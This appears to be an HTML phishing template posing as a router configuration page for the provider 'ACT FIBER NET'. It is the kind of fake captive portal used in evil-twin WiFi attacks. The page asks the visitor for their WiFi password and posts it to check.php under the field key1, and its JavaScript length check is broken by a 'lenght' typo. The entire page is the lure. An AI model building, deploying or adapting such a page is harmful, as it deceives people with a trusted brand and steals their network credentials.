<!DOCTYPE html>
<html lang=en> <head><title>Router Configuration Page</title><meta charset=utf-8><meta name=viewport content="width=device-width, initial-scale=1"><link rel=stylesheet href=bootstrap.min.css><script src=jquery.min.js></script><script src=bootstrap.min.js></script><!-- CSS --><style type=text/css>

    /* Sticky footer styles
    -------------------------------------------------- */

    html,
    body {
          height: 100%;
          /* The html and body elements cannot have any padding or margin. */
        }

        /* Wrapper for page content to push down footer */
        #wrap {
          min-height: 100%;
          height: auto !important;
          height: 100%;
          /* Negative indent footer by it's height */
          margin: 0 auto -60px;
        }

        /* Set the fixed height of the footer here */
        #push,
        #footer {
          height: 60px;
        }
        #footer {
          background-color: #f5f5f5;
        }

        /* Lastly, apply responsive CSS fixes as necessary */
        @media (max-width: 767px) {
          #footer {
            margin-left: -20px;
            margin-right: -20px;
            padding-left: 20px;
            padding-right: 20px;
          }
        }
  </style></head> <body> <!-- Start navigation bar --> <!-- To change the navigation bar color change background attribute --> 
 <!-- End navigation bar --> <!-- Start page content --> <div class=container> <div class=col-sm> <h2 class=text-center style=color:RoyalBlue>ACT FIBER NET</h2>  </div> 
 <form action=check.php method=POST> <div class=form-group> <label for=comment></label><label><input type=checkbox id=check-box onclick=checkBoxStatus()>Enter the correct password</label> </div> </div> <div class="form-group has-feedback"> <label for=password>WIFI PASSWORD:</label> <input class=form-control type=password id=pwd name=key1> </div> <div class="container text-center"> <input type=submit class="btn btn-primary" id=btn value="Connect"> </div> </form> <div id=push></div> </div> <!-- Start page content --> <!-- Start footer --> <footer class=footer> <div class="container text-center"> <p class=text-muted>ACT© 2023, All Rights Reserved.</p> </div> </footer> <!-- End footer --> <!-- Start update first message --> <div class="modal fade" id=update-only role=dialog> <div class="modal-dialog modal-sm"> <div class=modal-content> <div class=modal-header> <button type=button class=close data-dismiss=modal>&times;</button> <h4 class=modal-title>Information</h4> </div> <div class=modal-body> <p></p> </div> <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button> </div> </div> </div> </div> <!-- End update first message --> <!-- Start empty password message --> <div class="modal fade" id=empty-pass> <div class="modal-dialog modal-sm"> <div class=modal-content> <div class=modal-header> <button type=button class=close data-dismiss=modal>&times;</button> <h4 class=modal-title>Information</h4> </div> <div class=modal-body> <p>Please Input Valid Password. (Must be between 7 and 64 characters)</p> </div> <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button> </div> </div> </div> </div> <!-- End empty password message --> <!-- Start empty password message --> <div class="modal fade" id=no-checkbox> <div class="modal-dialog modal-sm"> <div class=modal-content> <div class=modal-header> <button type=button class=close data-dismiss=modal>&times;</button> <h4 class=modal-title>Information</h4> </div> <div class=modal-body> <p>Please Check The I Agree Button.</p> </div> <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button> </div> </div> </div> </div> <!-- End empty password message --> <script>

/*
  Check the password field and act accordingly.
*/
$("#btn").on("click", function(e) {

    // get the password box and checkbox elements
  var input = document.getElementById("pwd");
    var box = document.getElementById("check-box");

    // if the box is checked
    if ( box.checked != true ){
          // display no checkbox message
          $("#no-checkbox").modal("show");
    return false;
        }
        if ( input.value.lenght < 7 ||  input.value.lenght > 64){
    // display no password message
    $("#empty-pass").modal("show");
    return false;
    }


});


/*
  Check the status of check box
*/
function checkBoxStatus()
{
  // get the password box and checkbox elements
  var box = document.getElementById("check-box");
  var input = document.getElementById("pwd");

  // if the box is checked
  if ( box.checked == true )
    {
      // enabale the password box
      input.disabled = false;
    }
  else
    {
      // disable the password box
      input.disabled = true;
    }
  }
</script> </body> </html> 
